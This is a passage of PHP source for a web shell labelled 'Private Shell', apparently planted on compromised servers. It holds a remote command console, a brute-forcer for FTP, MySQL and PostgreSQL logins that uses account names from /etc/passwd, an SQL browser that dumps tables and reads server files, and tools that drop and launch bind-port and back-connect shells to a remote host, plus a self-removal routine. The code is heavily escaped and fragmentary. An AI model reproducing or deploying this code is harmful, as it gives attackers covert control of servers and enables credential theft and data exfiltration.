\\\'; printFooter(); } function actionConsole() { if(isset($_POST[\\\'ajax\\\'])) { $_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']).\\\'ajax\\\'] = true; ob_start(); echo \\\"document.cf.cmd.value=\\\'\\\';\\\\n\\\"; $temp = @iconv($_POST[\\\'charset\\\'], \\\'UTF-8\\\', addcslashes(\\\"\\\\n$ \\\".$_POST[\\\'p1\\\'].\\\"\\\\n\\\".ex($_POST[\\\'p1\\\']),\\\"\\\\n\\\\r\\\\t\\\\\\\\\\\'\\\\0\\\")); if(preg_match(\\\"!.*cd\\\\s+([^;]+)$!\\\",$_POST[\\\'p1\\\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\\\'cwd\\\'] = @getcwd(); echo \\\"document.mf.c.value=\\\'\\\".$GLOBALS[\\\'cwd\\\'].\\\"\\\';\\\"; } } echo \\\"document.cf.output.value+=\\\'\\\".$temp.\\\"\\\';\\\"; echo \\\"document.cf.output.scrollTop = document.cf.output.scrollHeight;\\\"; $temp = ob_get_clean(); echo strlen($temp), \\\"\\\\n\\\", $temp; exit; } printHeader(); ?> Console
>\\\"> send using AJAX
\\\'; echo \\\'
\\\'; printFooter(); } function actionLogout() { unset($_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\'])]); echo \\\'bye!\\\'; } function actionSelfRemove() { printHeader(); if($_POST[\\\'p1\\\'] == \\\'yes\\\') { if(@unlink(SELF_PATH)) die(\\\'Shell has been removed\\\'); else echo \\\'unlink error!\\\'; } echo \\\'

Suicide

Really want to remove the shell?
Yes
\\\'; printFooter(); } function actionBruteforce() { printHeader(); if( isset($_POST[\\\'proto\\\']) ) { echo \\\'

Results

Type: \\\'.htmlspecialchars($_POST[\\\'proto\\\']).\\\' Server: \\\'.htmlspecialchars($_POST[\\\'server\\\']).\\\'
\\\'; if( $_POST[\\\'proto\\\'] == \\\'ftp\\\' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST[\\\'proto\\\'] == \\\'mysql\\\' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.\\\':\\\'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST[\\\'proto\\\'] == \\\'pgsql\\\' ) { function bruteForce($ip,$port,$login,$pass) { $str = \\\"host=\\\'\\\".$ip.\\\"\\\' port=\\\'\\\".$port.\\\"\\\' user=\\\'\\\".$login.\\\"\\\' password=\\\'\\\".$pass.\\\"\\\' dbname=\\\'\\\'\\\"; $res = @pg_connect($server[0].\\\':\\\'.$server[1]?$server[1]:5432, $login, $pass); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(\\\":\\\", $_POST[\\\'server\\\']); if($_POST[\\\'type\\\'] == 1) { $temp = @file(\\\'/etc/passwd\\\'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(\\\":\\\", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo \\\'\\\'.htmlspecialchars($line[0]).\\\':\\\'.htmlspecialchars($line[0]).\\\'
\\\'; } if(@$_POST[\\\'reverse\\\']) { $tmp = \\\"\\\"; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo \\\'\\\'.htmlspecialchars($line[0]).\\\':\\\'.htmlspecialchars($tmp); } } } } elseif($_POST[\\\'type\\\'] == 2) { $temp = @file($_POST[\\\'dict\\\']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST[\\\'login\\\'], $line) ) { $success++; echo \\\'\\\'.htmlspecialchars($_POST[\\\'login\\\']).\\\':\\\'.htmlspecialchars($line).\\\'
\\\'; } } } echo \\\"Attempts: $attempts Success: $success

\\\"; } echo \\\'

FTP bruteforce

\\\' .\\\'\\\' .\\\'\\\' .\\\'\\\' .\\\'\\\' .\\\'\\\' .\\\'\\\' .\\\'
Type
\\\' .\\\'\\\' .\\\'\\\' .\\\'\\\' .\\\'Server:port
Brute type
\\\' .\\\'\\\' .\\\'\\\' .\\\'
Login
Dictionary
\\\' .\\\'
>\\\">
\\\'; echo \\\'

\\\'; printFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \\\'mysql\\\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case \\\'pgsql\\\': $host = explode(\\\':\\\', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect(\\\"host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname\\\") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case \\\'mysql\\\': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case \\\'mysql\\\': return $this->res = @mysql_query($str); break; case \\\'pgsql\\\': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case \\\'mysql\\\': return @mysql_fetch_assoc($res); break; case \\\'pgsql\\\': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case \\\'mysql\\\': return $this->res = @mysql_list_dbs($this->link); break; case \\\'pgsql\\\': return $this->res = $this->query(\\\"SELECT datname FROM pg_database\\\"); break; } return false; } function listTables() { switch($this->type) { case \\\'mysql\\\': return $this->res = $this->query(\\\'SHOW TABLES\\\'); break; case \\\'pgsql\\\': return $this->res = $this->query(\\\"select table_name from information_schema.tables where (table_schema != \\\'information_schema\\\' AND table_schema != \\\'pg_catalog\\\') or table_name = \\\'pg_user\\\'\\\"); break; } return false; } function error() { switch($this->type) { case \\\'mysql\\\': return @mysql_error($this->link); break; case \\\'pgsql\\\': return @pg_last_error($this->link); break; } return false; } function setCharset($str) { switch($this->type) { case \\\'mysql\\\': 
if(function_exists(\\\'mysql_set_charset\\\')) return @mysql_set_charset($str, $this->link); else $this->query(\\\'SET CHARSET \\\'.$str); break; case \\\'mysql\\\': return @pg_set_client_encoding($this->link, $str); break; } return false; } function dump($table) { switch($this->type) { case \\\'mysql\\\': $res = $this->query(\\\'SHOW CREATE TABLE `\\\'.$table.\\\'`\\\'); $create = mysql_fetch_array($res); echo $create[1].\\\";\\\\n\\\\n\\\"; $this->query(\\\'SELECT * FROM `\\\'.$table.\\\'`\\\'); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = \\\"\\\'\\\".@mysql_real_escape_string($v).\\\"\\\'\\\"; $columns[] = \\\"`\\\".$k.\\\"`\\\"; } echo \\\'INSERT INTO `\\\'.$table.\\\'` (\\\'.implode(\\\", \\\", $columns).\\\') VALUES (\\\'.implode(\\\", \\\", $item).\\\');\\\'.\\\"\\\\n\\\"; } break; case \\\'pgsql\\\': $this->query(\\\'SELECT * FROM \\\'.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = \\\"\\\'\\\".addslashes($v).\\\"\\\'\\\"; $columns[] = $k; } echo \\\'INSERT INTO \\\'.$table.\\\' (\\\'.implode(\\\", \\\", $columns).\\\') VALUES (\\\'.implode(\\\", \\\", $item).\\\');\\\'.\\\"\\\\n\\\"; } break; } return false; } }; $db = new DbClass($_POST[\\\'type\\\']); if(@$_POST[\\\'p2\\\']==\\\'download\\\') { ob_start(\\\"ob_gzhandler\\\", 4096); $db->connect($_POST[\\\'sql_host\\\'], $_POST[\\\'sql_login\\\'], $_POST[\\\'sql_pass\\\'], $_POST[\\\'sql_base\\\']); $db->selectdb($_POST[\\\'sql_base\\\']); header(\\\"Content-Disposition: attachment; filename=dump.sql\\\"); header(\\\"Content-Type: text/plain\\\"); foreach($_POST[\\\'tbl\\\'] as $v) $db->dump($v); exit; } printHeader(); ?>

Sql browser

\\\'> \\\'>
Type Host Login Password Database
\\\'> \\\'> \\\'> \\\"; if(isset($_POST[\\\'sql_host\\\'])){ if($db->connect($_POST[\\\'sql_host\\\'], $_POST[\\\'sql_login\\\'], $_POST[\\\'sql_pass\\\'], $_POST[\\\'sql_base\\\'])) { switch($_POST[\\\'charset\\\']) { case \\\"Windows-1251\\\": $db->setCharset(\\\'cp1251\\\'); break; case \\\"UTF-8\\\": $db->setCharset(\\\'utf8\\\'); break; case \\\"KOI8-R\\\": $db->setCharset(\\\'koi8r\\\'); break; case \\\"KOI8-U\\\": $db->setCharset(\\\'koi8u\\\'); break; case \\\"cp866\\\": $db->setCharset(\\\'cp866\\\'); break; } $db->listDbs(); echo \\\"\\\'; } else echo $tmp; }else echo $tmp; ?> >\\\">
link){ echo \\\"
\\\"; if(!empty($_POST[\\\'sql_base\\\'])){ $db->selectdb($_POST[\\\'sql_base\\\']); echo \\\"\\\"; } echo \\\"
Tables:

\\\"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); $n = $db->fetch($db->query(\\\'SELECT COUNT(*) as n FROM \\\'.$value.\\\'\\\')); $value = htmlspecialchars($value); echo \\\" \\\".$value.\\\" (\\\".$n[\\\'n\\\'].\\\")
\\\"; } echo \\\"
\\\"; if(@$_POST[\\\'p1\\\'] == \\\'select\\\') { $_POST[\\\'p1\\\'] = \\\'query\\\'; $db->query(\\\'SELECT COUNT(*) as n FROM \\\'.$_POST[\\\'p2\\\'].\\\'\\\'); $num = $db->fetch(); $num = $num[\\\'n\\\']; echo \\\"\\\".$_POST[\\\'p2\\\'].\\\" ($num) \\\"; for($i=0;$i<($num/30);$i++) if($i != (int)$_POST[\\\'p3\\\']) echo \\\"\\\",($i+1),\\\" \\\"; else echo ($i+1),\\\" \\\"; if($_POST[\\\'type\\\']==\\\'pgsql\\\') $_POST[\\\'p3\\\'] = \\\'SELECT * FROM \\\'.$_POST[\\\'p2\\\'].\\\' LIMIT 30 OFFSET \\\'.($_POST[\\\'p3\\\']*30); else $_POST[\\\'p3\\\'] = \\\'SELECT * FROM `\\\'.$_POST[\\\'p2\\\'].\\\'` LIMIT \\\'.($_POST[\\\'p3\\\']*30).\\\',30\\\'; echo \\\"

\\\"; } if((@$_POST[\\\'p1\\\'] == \\\'query\\\') && !empty($_POST[\\\'p3\\\'])) { $db->query(@$_POST[\\\'p3\\\']); if($db->res !== false) { $title = false; echo \\\'\\\'; $line = 1; while($item = $db->fetch()) { if(!$title) { echo \\\'\\\'; foreach($item as $key => $value) echo \\\'\\\'; reset($item); $title=true; echo \\\'\\\'; $line = 2; } echo \\\'\\\'; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo \\\'\\\'; else echo \\\'\\\'; } echo \\\'\\\'; } echo \\\'
\\\'.$key.\\\'
null\\\'.nl2br(htmlspecialchars($value)).\\\'
\\\'; } else { echo \\\'
Error: \\\'.htmlspecialchars($db->error()).\\\'
\\\'; } } echo \\\"

\\\"; echo \\\"

Load file >\\\'>
\\\"; if(@$_POST[\\\'p1\\\'] == \\\'loadfile\\\') { $db->query(\\\"SELECT LOAD_FILE(\\\'\\\".addslashes($_POST[\\\'p2\\\']).\\\"\\\') as file\\\"); $file = $db->fetch(); echo \\\'
\\\'.htmlspecialchars($file[\\\'file\\\']).\\\'
\\\'; } } echo \\\'
\\\'; printFooter(); } function actionNetwork() { printHeader(); $back_connect_c=\\\"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\\\"; $back_connect_p=\\\"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\\\"; $bind_port_c=\\\"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\\\"; $bind_port_p=\\\"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\\\"; ?>

Network tools

Bind port to /bin/sh
Port: Password: Using: >\\\">
Back-connect to
Server: \\\'> Port: Using: >\\\">

$out\\\\n\\\".ex(\\\"ps aux | grep bp\\\").\\\"\\\"; } if($_POST[\\\'p1\\\'] == \\\'bpp\\\') { cf(\\\"/tmp/bp.pl\\\",$bind_port_p); $out = ex(which(\\\"perl\\\").\\\" /tmp/bp.pl \\\".$_POST[\\\'p2\\\'].\\\" &\\\"); echo \\\"
$out\\\\n\\\".ex(\\\"ps aux | grep bp.pl\\\").\\\"
\\\"; } if($_POST[\\\'p1\\\'] == \\\'bcc\\\') { cf(\\\"/tmp/bc.c\\\",$back_connect_c); $out = ex(\\\"gcc -o /tmp/bc /tmp/bc.c\\\"); @unlink(\\\"/tmp/bc.c\\\"); $out .= ex(\\\"/tmp/bc \\\".$_POST[\\\'p2\\\'].\\\" \\\".$_POST[\\\'p3\\\'].\\\" &\\\"); echo \\\"
$out\\\\n\\\".ex(\\\"ps aux | grep bc\\\").\\\"
\\\"; } if($_POST[\\\'p1\\\'] == \\\'bcp\\\') { cf(\\\"/tmp/bc.pl\\\",$back_connect_p); $out = ex(which(\\\"perl\\\").\\\" /tmp/bc.pl \\\".$_POST[\\\'p2\\\'].\\\" \\\".$_POST[\\\'p3\\\'].\\\" &\\\"); echo \\\"
$out\\\\n\\\".ex(\\\"ps aux | grep bc.pl\\\").\\\"
\\\"; } } echo \\\'
\\\'; printFooter(); } if( empty($_POST[\\\'a\\\']) ) if(isset($default_action) && function_exists(\\\'action\\\' . $default_action)) $_POST[\\\'a\\\'] = $default_action; else $_POST[\\\'a\\\'] = \\\'SecInfo\\\'; if( !empty($_POST[\\\'a\\\']) && function_exists(\\\'action\\\' . $_POST[\\\'a\\\']) ) call_user_func(\\\'action\\\' . $_POST[\\\'a\\\']); ?>
Private Shell - Wireless crew © Copyleft 2009 -Pro_Wikileaks
Hacker-newbie.org